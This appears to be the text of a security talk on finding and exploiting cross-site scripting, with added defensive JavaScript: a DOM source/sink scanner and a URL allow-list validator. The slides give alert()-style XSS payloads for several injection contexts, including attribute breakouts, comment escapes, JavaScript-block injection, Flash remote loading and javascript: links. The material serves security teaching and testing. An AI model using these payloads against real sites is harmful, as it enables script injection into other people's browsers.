www.portcullis-security.com Portcullis Computer Security
How to detect and exploit 99% of XSS vulnerabilities
XSS? So what? XSS has recently proven dangerous enough to take seriously: via XSS Tunnelling it allows you to jump into a VPN or to bypass firewall rules.
What is it about? It is all about where the output goes: straight into HTML; into a JavaScript / VBScript block; as a tag attribute; and some other rare, strange places.
Understanding and exploiting XSS: it is like SQL injection, but the subsystem we inject into is a browser rather than a database, and instead of a single quote we have a new set of metacharacters.
Ultimate challenge: the ultimate challenge in any XSS issue is to escape the current block and make the browser render your piece of code.
XSS types: these are the most common XSS examples you are going to see in the wild, and I will try to show a demo exploiting each of them: HTML – normal; HTML – attribute without quotes; HTML – attribute with single quotes; HTML – in comments; HTML – in JavaScript blocks; DOM-based XSS; Flash-based XSS; direct linking.
Not covered: before jumping into exploiting these specific issues, note that the following rare but real-world concepts are not covered in this talk: XAS – Cross Application Scripting; security zones of IE; client-side issues like the .jar problem; advanced Flash analysis for XSS; exploiting XSS in the real world; bypassing HTML-parsing-based XSS filters like those of Gmail, MySpace etc.
HTML – Normal: the most common XSS type, or at least it was the most common one; nowadays most developers are aware of it. In this demo we assume there is no filtering on the server side.
HTML – Normal DEMO: <script>alert(0x1)</script>
HTML – Attributes without quotes: when the output is used as an HTML attribute value and the HTML is written sloppily with no quotes around it, we can bypass even server-side filtering! A space ends an unquoted value, so a new attribute can be injected without any of the characters a filter would encode.
HTML – Attributes without Quotes DEMO: %20 onload=alert(0x2) %20
HTML – Attributes with single quotes: wrapping HTML attributes in single quotes is quite common and valid, but a poor practice, since the single quote is not considered an HTML metacharacter and is not encoded by default XSS filter functions like htmlentities() or Server.HTMLEncode().
HTML – Attributes with Single Quotes DEMO: ' onload=alert(0x3)
HTML – In comments: if the output goes into an HTML comment we need a ">" to close the comment. This character is encoded by default filters, so the output has to be unfiltered for this to work.
HTML – In Comments DEMO: --!><script>alert(0x4)</script>
HTML – JavaScript blocks: JavaScript blocks are especially dangerous because the metacharacters change there. If the output goes into JavaScript we no longer need a tag opener or double quotes; it all depends on where in the JavaScript it lands: we may need a single quote, a double quote, or only a space or a semicolon.
HTML – JavaScript Blocks DEMO: ;alert(0x5)
HTML – DOM based: this is one of the rarest and hardest to spot XSS types. You need a simple source code analysis of the script code. Most DOM-based XSS issues cannot be identified by automated scanners (to be honest, none of them can!).
HTML – DOM Based DEMO: #alert(0x6)
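The slide says DOM-based XSS needs a source code analysis of the script rather than a scanner. As an added example (not part of the talk), here is the smallest useful form of that review: a line-oriented source/sink lint that tracks identifiers assigned from attacker-controlled DOM sources and flags sink lines that consume them. The sample script, the source and sink lists and the function names are all constructed here; it is a reviewer's aid that points at lines to read, not a parser that proves a bug.

```javascript
// Added example (not from the slides): a first-pass source/sink review of
// client-side script. Line-oriented and regex-based; it flags lines for a
// human to read, it does not prove exploitability.

// Where attacker-controlled data enters a page's script.
const SOURCES = [
  /\blocation\.hash\b/, /\blocation\.search\b/, /\blocation\.href\b/,
  /\bdocument\.URL\b/, /\bdocument\.referrer\b/, /\bwindow\.name\b/,
];

// Where that data gets interpreted as HTML, script or a navigation target.
const SINKS = [
  /\bdocument\.write(?:ln)?\s*\(/, /\.innerHTML\s*=/, /\.outerHTML\s*=/,
  /\.insertAdjacentHTML\s*\(/, /\beval\s*\(/, /\bnew\s+Function\s*\(/,
  /\bsetTimeout\s*\(\s*["'`]/, /\blocation(?:\.href)?\s*=(?!=)/,
];

// Constructed sample: the fragment after '#' flows through two variables
// into innerHTML (the shape of the slide's "#alert(0x6)" demo), plus a
// source written straight into document.write and two harmless lines.
const SAMPLE_SCRIPT = `var q = location.hash.substring(1);
var name = decodeURIComponent(q);
var el = document.getElementById('out');
el.innerHTML = name;
el.textContent = name;
document.write(location.search);
el.innerHTML = '<b>static</b>';`;

// '$' is the only regex metacharacter legal in a JS identifier.
function escapeRe(s) { return s.replace(/\$/g, '\\$'); }

// Walk the script once, tracking identifiers assigned from a source (or
// from an already tainted identifier), and flag any sink line that uses a
// source or a tainted identifier.
function scanScript(source) {
  const tainted = new Set();
  const findings = [];
  source.split('\n').forEach((line, idx) => {
    const readsSource = SOURCES.some(re => re.test(line));
    const usesTainted = [...tainted].some(
      v => new RegExp('\\b' + escapeRe(v) + '\\b').test(line));
    // "var x = ..." / "x = ..." at the start of the line (not "x == ...").
    const assign = line.match(/^\s*(?:var|let|const)?\s*([A-Za-z_$][\w$]*)\s*=(?!=)/);
    if (assign && (readsSource || usesTainted)) tainted.add(assign[1]);
    const sink = SINKS.find(re => re.test(line));
    if (sink && (readsSource || usesTainted)) {
      findings.push({ line: idx + 1, sink: sink.source, text: line.trim() });
    }
  });
  return { findings, tainted: [...tainted] };
}

// Usage: scanScript(SAMPLE_SCRIPT) reports lines 4 and 6 and the tainted
// identifiers q and name; line 5 (textContent) and line 7 (static HTML)
// are not reported.
```

Two things to keep in mind when using this on real code: it follows taint only through straight-line assignments, so data passing through a function call or an object property needs reading by hand, and `textContent` is deliberately absent from the sink list because it does not parse markup, which is also the usual fix for the flagged `innerHTML` lines.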
HTML – Flash based XSS: it is becoming more and more popular. There are several ways an XSS issue shows up in Flash, but the most common ones are remote Flash file loading and direct linking. Flash applications generally load remote resources, and if these resources can be controlled by parameters then the application can be called directly and forced to load a remote malicious Flash object.
HTML – Flash Based XSS DEMO: vuln.swf?player=http://example.com/xss.swf and, inside the loaded object, getURL('javascript:alert(0x7)')
HTML – Direct linking: if linking functionality exists, it is almost always vulnerable to this attack! It can be something like your e-mail address, your homepage URL, your photo URL, etc.
HTML – Direct Linking DEMO: javascript:alert(0x8)
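Both the Flash "remote file loading" slide and the direct-linking slide come down to the same defensive check: a URL supplied by the user (a homepage, a photo, a `player=` parameter) must be parsed and its scheme, and for loaded resources its host, allow-listed before it is used. The following is an added example for this page, not code from the talk: it uses the WHATWG URL parser available in Node 10+ and modern browsers, and the function names and host names are constructed placeholders.

```javascript
// Added example (not from the slides): validating user-supplied link and
// resource URLs, the defensive counterpart to the direct-linking and Flash
// remote-loading demos. Host names below are constructed placeholders.

const LINK_SCHEMES = new Set(['http:', 'https:']);

// Parse first, then allow-list the scheme. Parsing first matters: the URL
// standard strips leading controls and whitespace, removes embedded tab and
// newline, and lower-cases the scheme, so "  JaVa\tScRiPt:" still ends up
// as "javascript:" and is rejected. Returns null for anything unusable,
// including scheme-less input; callers should treat that as invalid rather
// than silently prefixing a scheme.
function safeLinkTarget(userUrl) {
  let parsed;
  try {
    parsed = new URL(String(userUrl));
  } catch (e) {
    return null;                       // relative, empty or malformed
  }
  return LINK_SCHEMES.has(parsed.protocol) ? parsed.href : null;
}

// For resources an application loads on behalf of a parameter (the
// "vuln.swf?player=" case): scheme allow-list plus an exact host allow-list,
// so the parameter cannot point the application at a third-party object.
function safeResourceUrl(userUrl, allowedHosts) {
  const href = safeLinkTarget(userUrl);
  if (href === null) return null;
  const host = new URL(href).hostname.toLowerCase();
  return allowedHosts.includes(host) ? href : null;
}

// Usage: safeLinkTarget('javascript:alert(0x8)') and
// safeLinkTarget('vbscript:msgbox(1)') return null;
// safeLinkTarget('https://example.com/p?x=1') returns the normalised href.
```

Whatever comes back from `safeLinkTarget` still has to be attribute-encoded when it is written into `href="..."`; scheme validation and output encoding are separate steps and neither replaces the other.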
Final words: if an XSS issue is exploitable in Internet Explorer it is highly likely to be exploitable in Mozilla-based browsers as well, though the attack vector may differ. CSS expression() and -moz-binding can allow you to trigger XSS payloads on load.
Final words: know what you send. Your browser may apply some encoding of its own that invalidates your XSS test. To be able to exploit the target server you may need to send HTML characters without proper encoding. Confirm what you send from your proxy, and be sure you have tested both with and without encoding.
vbscript:msgbox('Any Questions?')